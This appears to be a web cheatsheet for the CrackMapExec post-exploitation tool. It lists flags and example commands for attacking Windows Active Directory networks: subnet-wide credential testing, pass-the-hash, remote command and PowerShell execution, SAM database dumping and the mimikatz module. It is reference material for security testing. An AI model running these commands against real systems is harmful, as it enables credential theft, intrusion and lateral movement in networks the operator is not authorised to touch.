___________ __________ _____ ________ ________ .____ ___________ \_ _____/ \______ \ / _ \ / _____/ / _____/ | | \_ _____/ | __) | _/ / /_\ \ / \ ___ / \ ___ | | | __)_ | \ | | \ / | \ \ \_\ \ \ \_\ \ | |___ | \ \___ / |____|_ / \____|__ / \______ / \______ / |_______ \ /_______ / \/ \/ \/ \/ \/ \/ \/

crackmapexec Cheatsheet

← Back to cheatsheets

← Home

CrackMapExec (CME) is a post-exploitation tool for assessing the security of Active Directory environments. Enumerates, exploits, and pivots through Windows networks using various protocols.

Basic Usage

  • crackmapexec smb 192.168.1.0/24 - Enumerate SMB
  • crackmapexec smb 192.168.1.0/24 -u user -p pass - Authenticate
  • crackmapexec smb 192.168.1.0/24 -u user -H hash - Pass-the-hash
  • crackmapexec smb 192.168.1.0/24 -u user -p pass -M module - Execute module

Protocols

  • smb - SMB/CIFS protocol
  • ssh - SSH protocol
  • winrm - WinRM protocol
  • ldap - LDAP protocol
  • mssql - Microsoft SQL Server
  • rdp - Remote Desktop Protocol
  • vnc - VNC protocol

Authentication

  • -u user - Username
  • -p password - Password
  • -H hash - NTLM hash
  • -k - Kerberos authentication
  • -d domain - Domain name
  • -U user:pass - User:pass format
  • --local-auth - Local authentication

Enumeration

  • --shares - List shares
  • --sessions - List sessions
  • --loggedon-users - Logged on users
  • --disks - List disks
  • --users - Enumerate users
  • --groups - Enumerate groups
  • --computers - Enumerate computers
  • --pass-pol - Password policy

Execution

  • -x command - Execute command
  • -X command - Execute PowerShell
  • -M module - Execute module
  • --exec-method wmiexec - Execution method
  • --no-output - Suppress output

Common Examples

Enumerate SMB

crackmapexec smb 192.168.1.0/24

Scan network for SMB hosts.

Authenticate

crackmapexec smb 192.168.1.0/24 -u admin -p Password123

Test credentials across network.

Pass-the-Hash

crackmapexec smb 192.168.1.0/24 -u admin -H aad3b435b51404eeaad3b435b51404ee

Authenticate with NTLM hash.

List Shares

crackmapexec smb 192.168.1.0/24 -u user -p pass --shares

Enumerate SMB shares.

Execute Command

crackmapexec smb 192.168.1.10 -u admin -p pass -x "whoami"

Run command on target.

PowerShell

crackmapexec smb 192.168.1.10 -u admin -p pass -X "Get-Process"

Execute PowerShell command.

Dump SAM

crackmapexec smb 192.168.1.10 -u admin -p pass --sam

Dump SAM database.

List Modules

crackmapexec smb --list-modules

Show available modules.

Use Module

crackmapexec smb 192.168.1.10 -u admin -p pass -M mimikatz

Execute module.

Tips

  • Use -H for pass-the-hash attacks
  • Use --shares to discover file shares
  • Use -x for command execution
  • Use -X for PowerShell execution
  • Check --list-modules for available modules
  • Use -k for Kerberos authentication
  • Essential for AD security testing
  • Powerful lateral movement tool